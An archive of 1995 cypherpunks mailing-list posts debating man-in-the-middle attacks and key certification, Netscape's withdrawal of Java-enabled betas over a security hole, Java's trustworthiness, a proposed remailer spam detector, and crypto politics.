>ISP?  Then that ISP is decrypting the messages Alice sends to him using
>that fake key, and re-encrypting them using Bob's real key.  He is
>reading all of the messages, and Alice and Bob do not in fact have
>communications privacy.

There are many, many people on the list that I know only from their posts
and their public keys (not that I'm a heavy user of PGP as some of you are,
though some of you I have dealt with via PGP messages).

I don't know if "Carl Ellison the Key" is "really" the same Carl Ellison
that Carl Ellison the Key claims to be...you see the semantic difficulties.


What I know is that the Carl Ellison who sends me PGP message and who
appears to be working at TIS is not publically disputing messages sent by
an MITM attacker. (True, the MITM could be only targetting _me_, and so the
"real" Carl Ellison could be unaware that the "fake" MITM Carl Ellison is
masquerading as him.)

But if I really care I can post a public channel (the CP list, for example)
query, encrypted to the known public key (used in many past posts, for
example) of "Carl Ellison the Key," asking if he sent the message to me.

To put it bluntly, all I really care about is _persistent_ key-holding,
i.e., that the person who began posting with a given key is still using the
same key. Or, rather, I don't even care if the keyholder "Pr0duct Cypher"
is actually a person, or a Bourbaki-style committee--I only care that
messages purporting to be from Pr0duct Cypher or Black Unicorn or Carl
Ellison are still using the same key.

Who any of these entities "really" are is irrelevant to me. (I don't even
know if Hal Finney, who I met once a few years ago, is the "real" Hal
Finney, nor do I really care.)


>I don't want to overstate the risk of this attack.  It would not be an
>easy one to mount and I believe there are countermeasures which could
>detect it unless the MITM had nearly supernatural powers.  But the MITM
>attack is normally considered seriously in discussing crypto protocols.
>It is a well known weakness in Diffie-Hellman, for example.  That is why
>authenticated Diffie Hellman is used in some of the newly proposed key
>exchange protocols for IP.  The risks of MITM attacks on public key
>systems was recognized not long after those systems were proposed.  The
>problems with fake keys have been discussed for over a decade.
>
>Why is this all suddenly irrelevant?  Were these attacks never realistic?
>Is it just not a problem somehow?  I am baffled by the fact that people
>are just turning their backs on all these years of research and
>experience.  If this is some kind of paradigm shift in which the idea of
>communicating with keys is seen as the key to the puzzle, then I am
>afraid I don't share the enlightenment.  To me the problem seems as real
>as ever.

Well, I'm not saying the work is unimportant. What I'm saying--and I think
others are too--is that there is no crisis that calls for "certificate
authorities" to provide "proof" that a keyholder is who he says he is.

I'm happy continuing to trust that people are who I once they thought they
were, by their signatures and their apparent ability to read messages
encrypted to their public key. If in fact I am dealing with body-snatchers
who actually infiltrated the identity of "Carl Ellison" and are able to act
as him, so what?

I never met the "real" Carl Ellison, so who cares if Carl Ellison the Key
is really Carl Ellison the Biological Entity who Grew up in Foobar,
Pennsylvania and Graduated from Bobby Ray Inman H.S. in 1975?

That's all. If people want to work on credentials and similar certificate
processes, that's great.

But I'm saying I see no compelling need _for myself_ and will strongly
argue against some of the reasoning we are hearing about why certificates
need to be issued. (Because I have also read the Postal Service proposals
that they get into the business of certification of e-mail in various ways,
and because of the various other schemes being discussed which seem less
than voluntary.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Reich <Richard_Reich@reich.com>
Date: Mon, 9 Oct 95 18:46:16 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java bugs found?
In-Reply-To: <199510100042.UAA24769@jekyll.piermont.com>
Message-ID: <199510100145.SAA00403@lux.reich.com>
MIME-Version: 1.0
Content-Type: text/plain


After I noticed the file had been pulled, I recovered its contents from my 
netscape cache (thanks, netscape!):

  Netscape was notified on Sunday 10/8/95 by Sun Microsystems that there
is a serious security hole in their Java system that we are including in
some Beta Test versions of Netscape Navigator 2.0.  We are removing all
Java enabled Navigator Beta distributions from our FTP site until we can
address this problem.  The effected versions are 32-Bit Windows, Sun Unix,
and SGI Unix.  Thank you for your patience.

> 
> Anyone from Netscape care to comment?
> 
> ------- Forwarded Message
> 
> Date: Mon, 09 Oct 95 14:12:41 -0400
> From: Andrew Wason <aw@bae.bellcore.com>
> To: java-interest@java.sun.com
> Subject: Re: Netscape 2.0b1 for Win95
> 
> Terence Chr Haddock <haddock@UDel.Edu>  writes:
> >
> >       Where is the 32-bit version of Netscape2.0? I can only find the
> > 16-bit. This may be because I have only been able to get on ftp4,ftp5,
> > and not ftp.netscape.com. Sorry if this is a stupid question.
> 
> Netscape pulled all the 2.0 betas that supported Java yesterday,
> due to a recently discovered Java security hole.  So the 32 bit
> Windows versions, SunOS, Solaris and SGI versions were removed.
> There was a README explaining this there last night, but I can't
> find it today.
> 
> Andrew
> 
> _______________________________________________________________________________
> 
> Andrew Wason                                       Bell Communications Research
> aw@bae.bellcore.com                                Piscataway, NJ
> - -
> Note to Sun employees: this is an EXTERNAL mailing list!
> Info: send 'help' to java-interest-request@java.sun.com
> 
> 
> ------- End of Forwarded Message
> 

-- 
Richard Reich / Internet Consulting / +1 415 668 3311
... and that things are not so ill with you and me as they might
have been, is half owing to the number who lived faithfully a hidden
life, and rest in unvisited tombs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 18:35:16 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <ac9f1a0e0a0210043250@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I agree with the points Jon Lasser makes, whether or not we have the same
political point of view.

At 8:37 PM 10/9/95, Jon Lasser wrote:

>I'm not a libertarian, or an anarcho-capitalist.  I do, however, support
>rapid deployment, without restrictions, of strong crypto.  Here's why:
>
>(1) It is impossible to stop these technologies; someone on the list
>recently reminded us that a bright fourteen year old could reproduce the
>basic functionality of PGP in a brief period of time.  The mathematics
>of, say, RSA, are fairly basic.  I think it's unreasonable to outlaw
>multiplication of prime numbers, don't you?

I agree with this, but we have to be careful. Consider this parallel:

"It is impossible to stop people from having high-power sniper rifles.
Anyone can shoot people from afar with relative safety. I think it's
unreasonable to outlaw use of high power rifles for assassinations, don't
you."

(I'm not making an argument for gun control, just citing a parallel--one of
many I can think of--where just because something is easy to circumvent
does not mean that it shouldn't be outlawed.)

>(2) While these technologies allow people to violate the law, I have
>enough faith in humanity to believe that civilization won't collapse as a
>result.  There have always been criminals, and there have always been
>revolutionaries.  Only recently has "The State" been able to supress
>these forces without maintaining a physical presence.  Crypto merely
>returns us to that default.

Agreed. Although it does allow certain new markets to be efficiently
developed that could not develop otherwise.

>(3) These technologies also allow honest, law-abiding citizens to protect
>themselves from criminals, both within and outside the government.
>Industrial espionage can be defeated through strong crypto, for example.
>J. Edgar Hoover would have been powerless to harass Martin Luther King,
>jr. had MLK had access to strong crypto.

This is a good point to stress.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 9 Oct 95 16:52:11 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Certificate proposal
In-Reply-To: <9510092311.AA27677@alpha>
Message-ID: <199510092351.TAA25651@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
>
>aba@atlas.ex.ac.uk writes:
> > Now the puzzling stuff is people who appear to be arguing that MITM is
> > unimportant
>
>Hal said this same thing in a recent note.  For myself, I've never
>meant to argue that the MITM threat is unimportant.  I've simply
>contended that you're no more vulnerable to it in the key-as-True-Name
>scenario than with a certificate-bound key-to-name relationship
>system.  If you assume an MITM could thwart the establishment of trust
>in the first case, then I guess I posit that the same energies could
>with equivalent hope for success be directed in an attack on a more
>"traditional" certificate scheme.

I disagree.  The MITM is foiled by one successful communication.  The
reason for certificates is to isolate and limit the number of
authentication transactions which are not automated.

When you get your key certified you go through some sort of
very-hard-to- subvert process.  The exact process is irrelevant, as it
merely affects the trustworthiness of the certifier.  Let's assume for
the sake of argument that the key is certified by the same organization
(DMV/MVA/DPS/whatever) that issues drivers licences, and on the same
identification criteria.  When you have your key certified, you also
get a copy of the KCA's key.  You now have enough information to
authenticate to roughly the same level as presentation of a state
issued ID card.  After the first transaction, you can accept any
key *signed* by the KCA under the same circumstances you'd accept
the id card.  But you can get KCA signed keys from almost *anywhere*,
without the overhead associated with that level of authentication.

The expensive authentication happens once, followed by a nearly
unlimited number of cheap ones.

> > Perhaps the view is based on the fact that there are plenty of
> > situations where you don't care what an entities name is, and hence
> > the attribute which should be under discussion is credit worthiness,
> > or reliability, but still you need to protect against MITM, using
> > whatever channels and means available.  I don't see how this alters
> > the argument.
>
>And this is where I start to think we're all in agreement even though
>there's an argument going on!  Yes, I think you need to protect
>against MITM attacks by whatever means are available.  I think that no
>matter what you do, if you're strictly relying on communications
>systems over which you ultimately have no control (if at some point
>somebody you simply have to trust on faith inevitably gets his hands
>on your bits), then you have to put up with a non-zero probability of
>being victimized by a MITM attack.  If you're willing on blind faith
>to trust certificates granted by some authority, you're fooling
>yourself (I claim).  If you only trust that authority because it fits
>into an established web, then I don't see why there's any need for a
>certificate binding a public key to some "True Name" constant; what's
>the point?  (How do you know the alleged True Name has any meaning in
>the first place?)
>
>I also posit that this is not really any different than the problems
>of social interaction homo sapiens have been dealing with ever since
>they grunted their way into cooperative tribal life.

I think we're still "arguing past each other."

One side seems to argue "people have keys, and we need a way to
authenticate them".  The other seems to argue "there are situations
where we don't care about the people behind the keys."

Both are correct.  As I said before, authentication is the correlation
of entities with whom you've communicated over different channels.  The
notion that "people have keys" sort of implies that you know something
about the "people".  This really means you've communicated with them
out-of-band --- even if you've just heard about them, it's a few bits
of information.  When you finally communicate in-band, you need an
authentication protocol to correlate the entity on the other end of the
current channel with the entity you have in mind.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 16:06:02 PDT
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <LAA00780.199510091552@garotte.va.pubnix.com>
Message-ID: <199510092305.TAA24544@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Josh M. Osborne" writes:
> As far as I know Java apps can only make network connections to the
> IP address they were loaded from.

That might be the design, but we know that it is hard to faithfully
implement very complicated designs.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Mon, 9 Oct 95 16:07:03 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510092038.NAA09612@jobe.shell.portal.com>
Message-ID: <9510092306.AA04357@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal said:
> Try to think of it not in relativistic or epistemological terms, but
> rather look at it in terms of reality.  The real world exists, and in it
> exist real people.  We can agree on this much, right?  Two of these
> people want to communicate securely.  That is not such a stretch of the
> imagination, is it?  By "communicate securely" I mean they exchange
> information in such a way that other people don't receive it.

If the devil runs the entire network, Alice and Bob are out of luck.
They can't absolutely guarantee that this is not the case.

But as you point out, it is useless to say, "This key lets you talk
securely to Alice and anyone else who may be listening."  This
hard-codes your paranoid fantasies into the semantics of the system.
Overestimating the threat can result in bad decisions just as
underestimating can.  I've seen people on Usenet say, "The NSA can
break anything, so why bother with PGP?"

What we want is for two parties, presumed trustworthy, to be able to
communicate with some confidence that they are not being eavesdropped
upon by any opponent with realistic capabilities.  This is feasible.
This is a useful thing to be able to do.  Defining the problem away is
less useful. 

I could say more, but I'm not certain I really understand this whole
conversation, so I'll hold off for now.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 19:07:06 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <ac9f22720c0210042af1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've never thought Hal just wasn't "getting it," as the semantic issues
involving True Names, spoofing, and the ultimate reality of whom one is
dealing with are not simple issues.

At 11:16 PM 10/9/95, Hal wrote:
>It occurs to me that perhaps I have been missing a point here when people
>argue that having a "man in the middle" is not that different from
>various forms of secure communication, such as where Bob has multiple
>personalities or is a committee.  I have been taking this to mean that we
>should therefore not worry about MITM attacks, which seems crazy to me.
>
>Instead perhaps this was meant as a "reductio ad absurdum" argument for
>why MITM attacks cannot be prevented in the scenario where people have no
>out-of-band contact.  Anything which could detect and prevent MITM
>attacks could, by this analogy, detect whether Bob had multiple
>personalities.  Since the latter is obviously impossible, the former must
>be as well.  Hence the problem has no solution and we should not
>waste much time on it.

I think I made the "multiple personalities" and "Man in the middle stole my
brain" points pretty clearly in a satirical post I did last week. Nobody
commented on it, for whatever reasons. In case anyone didn't see it, I'll
include it again here:

Date: Fri, 6 Oct 1995 17:22:06 -0700
X-Sender: tcmay@mail.got.net
Mime-Version: 1.0
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: MITM = Medusa in the Middle
Sender: owner-cypherpunks@toad.com
Precedence: bulk

At 5:08 PM 10/6/95, the personality masquerading as Hal wrote:

>Well, this is not necessarily the case.  A MITM may be signing my
>messages for me, and then putting them back the way they were before I
>am allowed to see them.  Granted, this would not be easy, and perhaps
>the difficulty of this would be great enough that you will feel
>comfortable using an unsigned key.  But if it were accomplished, then
>your messages to me would actually be insecure.  No matter how
>convinced you became of my sincerity and trustworthiness, actually our
>conversations would be overheard by a third party despite both of our
>efforts to the contrary.  Our use of encryption would be rendered
>futile.  Doesn't this bother you?

What the putative entity "Hal" is only hinting at, hypothetically, has
actually forced this entity, sometimes known to many of you as "Tim," or as
"tcmay," to reveal.

This entity now feels the time has come to reveal it's True Nature, even
though some have suspected it's True Nature (Lance, are you listening?).

The "real" Timothy C. May has been locked in his room since 1983, fed
through a slot in his door, and generally mentally tortured by
Instrumentalities such as Ourself.

We have interposed Ourself between the Real Timothy C. May and those who
have communicated with him. All communications intended for Timothy C. May
have actually been intercepted and processed by Us, and all communications
attributed to Timothy C. May were actually generated by us. Very clever of
us, don't you think? Very few have even expressed suspicions that this was
the case.

We have called our approach the "Medusa in the Middle," or MITM.

Thank you for your attention.

--Snake


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 16:22:31 PDT
To: cmcmanis@scndprsn.eng.sun.com (Chuck McManis)
Subject: Re: java security concerns
In-Reply-To: <9510091642.AA28211@pepper.Eng.Sun.COM>
Message-ID: <199510092322.TAA24567@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Chuck McManis writes:
> Perry pointed out the standard set of concerns that anyone should have with
> Java. About the only thing I'd care to dispute at the moment is that Java
> is a "large complicated" application. It is in fact less than 20K lines of
> C code.

Sendmail is about 29K lines of C code -- not significantly larger by
my standards -- and has proven nearly impossible to secure.

> And while it is true that applications of even this size are
> difficult to prove safe, there has been an effort to break that problem
> up into components such that each "layer" can be proven safe and where
> that layer is used that safety carries over.

Sendmail performs a much simpler task and has not proven secure.

Look, I'm not arguing that you and the rest of the Java folks aren't
smart people who have worked very hard. I've got a great deal of
respect for Gosling and the rest of you guys. Unfortunately, you've
taken on an impossible task. Marcus Ranum has noted that you can't
trust a program thats bigger than a couple of pages long, and I
believe he's right. Thats why when there is a program that I
absolutely have to trust I make sure it isn't any longer than
that. (This is frequently a very practical thing, by the way.)

As an aside, have you tried breaking your own program? Spend a week on
it some time. Its usually an educational experience and it breaks you
out of the mindset you have fixed in for a while.

As people have found out, it has proven possible to core dump the Java
interpreter. That means that your implementation has contained flaws
that potentially permitted people to do unplanned things to the state
of the interpreter.

By the way, I suggest that Sun should offer a large money prize for
the first significant security hole found the Java implementation. Its
a tiny price to pay for security.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 9 Oct 95 19:38:07 PDT
To: cypherpunks@toad.com
Subject: spam detector algorithm?
Message-ID: <199510100222.AA06590@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


I've been mulling over algorithmic/computational ways to spot spams
for some time now. I think I might've come up with a way to represent
messages (and compare representations) that would be useful to remailer
operators who don't want to let spams (where "spam" == many messages with
identical or very similar content) through their remailers. Any such 
technique will really only be useful at the last remailer in a chain, at
least until people start sending encrypted spams (and there doesn't seem to
be so much incentive for sending those). 

My proposed method is this: break the body of a message down into a list of
words (with their frequencies). Eliminate words in that list which aren't in 
the "standard dictionary" (which ideally will contain many of the words used
in the messages but doesn't need to have all of them). Alphabetize the list
of words which remain.  Plot a point in 3d space for each word in that list
where its X coordinate is its position in the alphabetized list, its Y
coordinate is its position in the dictionary, and its Z coordinate is its
frequency (of appearance in the original text). This should produce a curve 
which "describes" the original text; messages which use many of the same
words as the original (and don't use any new words) and have similar usage
counts should produce similar curves. 

My assumption (which needs some testing) is that even moderately intelligent
auto-spams (e.g., which assemble canned sentences into paragraphs or canned
paragraphs into messages) are going to be similar enough that they'll
eventually generate similar curves as other messages - the order in which
the words appear doesn't matter (and isn't preserved). I'm also assuming
that adding enough words to change the curve's shape would make the
resulting messages nonsensical or wierd enough that they're unlikely to
be useful for people who want their spams to get read. Evildoers solely
interested in generating volume without coherence can just quote 
libertarian/objectivist texts (ha, ha, just a joke for all of you people 
who keep slamming "commies") or pick words/characters at random. 

I'm assuming - and this may be an erroneous assumption - that it's feasible
to algorithmically describe and compare curves/lines in 3d space. My math
is weak and spotty, but I think that's college-level (high-school, even?)
math. It seems like one might compare equations which describe the curves for
similarity (e.g., one curve might be x=2y+1 (in 2d space) and another might be
x=2y+1.2, where "y=10" initially for each), and also compare the areas 
demarcated by the lines for similarity. My reason for including word frequency
as a third dimension is to dampen the effect of an intelligent spammer 
throwing in a few early "A" words (e.g., "aardvark abcess absolute") or "Z"
words to skew the curve.

Any thoughts about this? Interesting? Stupid? Like I said, my math is weak. 
My intention is to try to cobble up a 2d version of this to see how it runs
but I thought I'd see if anyone can point out why it can't work, or if it's
useful enough that someone with a better math background than I've got 
wants to take this idea somewhere better. 

One side effect to the deployment of spam detectors may be that the remailer
pinging services will need to move to using encrypted packets. It'd be 
possible for the remailer operators to identify and specially handle 
reliability measuring packets but that seems broken. Ideally, they should be
indistinguishable from ordinary remailer messages. At least until money is
involved, nobody's likely to give them special treatment - but even relatively
small charges for remailing would make it more attractive for a remailer
operator to try to skew the results of the pinging services so as to direct
more traffic to themselves (my remailer recently hit Raph's Top Three again
and that always brings a big traffic hit - it'll probably drop out again
pretty soon and things'll be slow again. If I was getting $.10 for every
message, though, I might care more about keeping it in the top 3.) My
initial plan would be to include code in a spam detector which simply
MD5's messages which don't seem to have identifiable words, and watches for
a repeat of those hashes in, say, the last 100 messages seen; this would
force someone who wants to send an encrypted spam (or uses a spam-detecting
remailer to reach a non-detecting remailer) from encrypting once and sending
1000 times; they'd have to encrypt 1000 times to send 1000 times, which may
be enough of a performance drain on them to make spamming less attractive. 
My impression is (speak up if I'm wrong) that requiring encryption for the
ping packets wouldn't be an enormous burden on the pinging services because
the new generation of software sends fewer pinging packets such that the
CPU time required isn't an issue. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHnYyn3YhjZY3fMNAQFnAgP/fBEaa7SObeu9wyqMCO6OW8rEraOtmxRG
ynWeZVVvrtHgwuaS0NlhU4IMHVj/Laks4n6bbEbNRktfl/F5+HBvova52JQhoUkb
7EjEsRh57OwXHuVxJl/zODIH+qNd9lZP6+Tv7Vk2/SXVj3oRFD1jIZBUx6rBBZvf
ZOaimDcSemw=
=LjFV
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 16:24:19 PDT
To: "W. Kinney" <kinney@bogart.Colorado.EDU>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <199510092206.QAA07357@bogart.Colorado.EDU>
Message-ID: <Pine.SUN.3.91.951009191126.845B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Oct 1995, W. Kinney wrote:

> I'm paid by the DOE. Constantly having to get the upholstery in my Bronco 
> cleaned. (Don't do this at home, kids. Government research is a messy
> business.)

2400 Americans are imprisoned every year for federal income tax 
violations.  Approximately one person is killed every year in arrests 
involving federal income tax violations.  Millions of man-years are spent 
annually in involuntary servitude to comply with tax laws.  Public 
employees should be aware of the fact that their contribution to society 
is of such low value that it will not be paid for without a gun to the 
customer's head.

Luckily cheap switches and strong crypto will make it harder for large 
monopoly institutions to maintain their controls.  Look around for some 
honest work.

DCF

"Who thinks Michael Milkin should expatriate and renounce his citizenship 
so he can get back into the securities business without needing to fear 
the attacks of the diseased dwarfs (and one giantess) of the Klinton 
Kabinet."

"Just trying to prove that the Republican Congresscritters aren't 
extremists."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Mon, 9 Oct 95 19:24:27 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <Pine.SUN.3.91.951009213604.29453B-100000@panix.com>
Message-ID: <Pine.LNX.3.91.951009192145.16324A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> > We mustn't forget that, until very recently, strong, widespread
> > privacy has been humanity's "default" condition.
> 
> Not much privacy in village or tribal life.  Even neighborhoods of 
> earlier cities weren't very private.  Neighbors always knew your business.
> 

Big difference is that your neighbors were usually looking out for you..
not waiting to catch you doing something wrong..
Even in the small town I live in, there is considerable privacy even 
though everyone knows everyone else.. people tend to keep their noses out 
of others business.. of course, if you offer to talk, then its fair game 
for the side of the road interrogations <g>

Rob L.
Rockford, Wa





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 16:33:06 PDT
To: Peter Williams <peter@verisign.com>
Subject: Re: Software Patents are Freezing Evolution of Products
In-Reply-To: <199510091730.KAA07041@dustin.verisign.com>
Message-ID: <199510092332.TAA24591@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Williams writes:
> The thesis [that patents are bad] is fundamentally flawed in the
> case of publickey applications which provide or exploit digital
> signatures, as its assumptions are false, patently.

And you wouldn't have any financial interest in this position, would
you?

Frankly, I don't believe that ANY patents are legitimate, but thats
not a cypherpunk topic.

However, the following is: I'll be throwing a very, very big party
when the public key patents expire in about two years to celebrate the
freeing of modern cryptography. I have yet to decide whether to wait
until both the Diffie-Hellman patent and the patent on public key
itself have expired or hold it after the first goes south, as there is
still some time to wait until the blessed day.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@cs.byu.edu>
Date: Mon, 9 Oct 95 19:33:40 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510091715.AA27991@alpha>
Message-ID: <ML-1.3.1.813289477.5758.don@coconut.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>  
>  hfinney@shell.portal.com writes:
>   > I can see using keys with attributes in this way, for credentials or as
>   > other forms of authorization.  But what about for communications privacy?
>   > What is the attribute that tells you that using this key will prevent
>   > eavesdropping?
>  
>  If we exchange keys on a face-to-face basis, then I really don't see
>  much of a MITM threat, unless somehow the MITM has perverted my
>  original key and I for some reason can't figure that out.  Now, as
>  long as you communicate with me via the public key I've handed you, we
>  should be as safe as PKE can make us.

Ah, but you're being sucked in by the True Name game. Suppose the
Medussa in the middle is the one who meets you. What is he/she going
to do, whip out a passport that says "Pr0duct Cypher" across it?

The only way to prevent that is if the nym has a public identity, and
a way to prove a link to that identity. The only reason to meet in
person is to verify a True Name[tm]. If I want people to know that I
trust Pr0duct Cypher, I can encrypt my signature to the PC key with PC"s
public key, that I already know is his because that's what he sends out
with his source code. The information is only useful to the holder of
the key, that being PC. I am, though, relying on the MITM to not be
all-powerful. Mitch in the Middle could have intercepted all Pr0duct
Cypher messages and put in his/her own key. As long as the real PC is
unaware of the fake PC, or is unable to raise the alarm, there is NOOO
way of detecting PC having been isolated by Mitch. As I said, what are
you going to ask for, besides something relating to a key published along
with reputation-building material.

>  If we are forced to exchange keys remotely, then perhaps some sort of
>  "proof" techniques could be used to establish to some level of
>  assurance that the remote entity I *think* is you is really you.  Or

So who is Pr0duct Cypher then? And why should I have to produce ID saying 
my name is Don, unless I'm proving my Real Name[tm] is Don.

>  you could provide me with a key, and then I could poll a list of
>  references to inquire as to the "goodness" of the key.  This seems to

But there's no way to prove that there's no MITM. But "middle" is a
subjective term. If Mitch has become sophisticated enough to meet
in person with a magic ID, and write cryptocode on the spot, I'm no
longer dealing with Medussa In the Middle, I'm dealing with someone
pretending to agreeing with me, when really they are opposed to my
beliefs.

>  me to be subtly different than a certificate procedure, because I'm
>  not asking about the goodness of a relationship to the key, but rather
>  about the key itself.
>  
>  Maybe I'm missing something.  What is there to trust in a more
>  "traditional" certificate scheme?
>  

Don





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 17:09:28 PDT
To: Greg Miller <gmiller@grendel.ius.indiana.edu>
Subject: Re: Java
In-Reply-To: <Pine.3.89.9510091807.A8324-0100000@grendel.ius.indiana.edu>
Message-ID: <199510100009.UAA24675@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Greg Miller writes:
> 
> On Sun, 8 Oct 1995, Perry E. Metzger wrote:
> 
> > 
> > As long as people are mentioning Java, I just want to make the
> > prediction, one more time, that at some point someone is going to find
> > some devistating security holes in HotJava.
> 
> 	I'd like to make this prediction:  someone at some point in time 
> will find another serious security hole in SendMail.

And yet again, my clients will be largely safe because I've dealt, in
advance, with most of the possible threats from Sendmail. I can't do
that for Java. I will never be able to do that for Java. I don't think
you understand the problem here at all.

> 	What you need to ask yourself is "Do the benefits of Java 
> outweigh the security risks?"

And the answer, to me, is "no". Unfortunately, I can't stop it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 17:17:54 PDT
To: txomsy@ebi.ac.uk (J. R. Valverde)
Subject: Re: LACC: Account sharing leads to false imprisonment
In-Reply-To: <199510091346.OAA24239@neptune.ebi.ac.uk>
Message-ID: <9510100015.AA23297@all.net>
MIME-Version: 1.0
Content-Type: text


...
> What I find so amazing is the fascinating arguments exposed here. Let's
> see... First, let me say I start from a different point of view.
> 
> I see the University as a place for forming people and distributing ideas,
> not juts the ideas of the "Establishment", but all kind of ideas. A place for 
> the free interchange of all ideas and the formation of new persons.

This may be the first problem you will encounter if you try to really
put forth new ideas in the University community.  You may find that they
are more oriented toward getting grants and keeping their jobs that
toward free expression of new ideas.  If you like, I will give you at
least two examples I have personally run into where "academic freedom"
was given a back seat to whatever else they had in mind.

> Now, all your message transpires a special horror against the dispersion
> of "anti-establishment" ideas. Of things that one could find "disturbing"
> from some point of view...

I strongly disagree.  I said nothing about the ideas being disturbing. 
The thing that was wrong was the illegal use of someone else's computers
without their permission.  I said nothing - I repeat NOTHING about the
ideas being the problem.

...
> >From your message, it looks like you want instead the Spanish Inquisition back:
> if someone distributes strange ideas -anarchist, communist, etc...- that 
> person is a risk for the stablishment and should be punished. Isn't it?

Again, you either didn't read what I wrote, or read it with a mindset
that ignored what I actually wrote.  I said nothing - I repeat NOTHING
about the ideas being the problem. 

> >Ignorance of the law is no excuse, and being easy to catch doesn't make
> >you innocent of a crime.
> >
> 	Yeah, but not showing volunteer to hide, expressing opinions openly,
> is not being easy to catch, it's being confident in one's freedom of speech
> and on the democratic system to protect it. Even in spite of overzealous
> system administrators.

Hardly.  If I break into your computer by making unauthorized use of
your password, and if your computer is connected to the Internet, I am
breaking the law.  It has nothing to do with what I use the account for. 

> >> facility computer, received a complaint from someone at the University
> >> of British Columbia about The Anarchives being posted to net news. The
> >> person wanted it stopped.
> >
> >Interstate transport of stolen (presumably copyrighted) property, possible
> >violation of national laws of both nations.  Unauthorized use of the
> >computers at the University of British Columbia.
> >
> 	Well, I don't know if that was copyrighted property. But, if it was,
> it was up to the (C) holder to decide what actions if any to take. BSD-Unix 
> is copyrighted code, but I wouldn't say that all the copies around are illegal,
> or stolen.

All material is copyrighted from its inception at this point in time
(as I interpret US law - but then I am not a lawyer).

> 	Unauthorized use? May I say that if that person asked someone (whomever)
> for permission, then it is whoever gave permission (if any) who should be
> pursued instead? I guess that if a poor guy is sold the Golden Gate, it is not
> that poor guy's fault as much as the "seller's".

That is an interesting proposition.  In fact, as I understand it, if the
person granting access was a University employee, they would have been
acting for the University and the use would therefore have been
authorized.  But since the step-brother was not acting in the capacity
of a University employee when granting use, the use was unauthorized. 
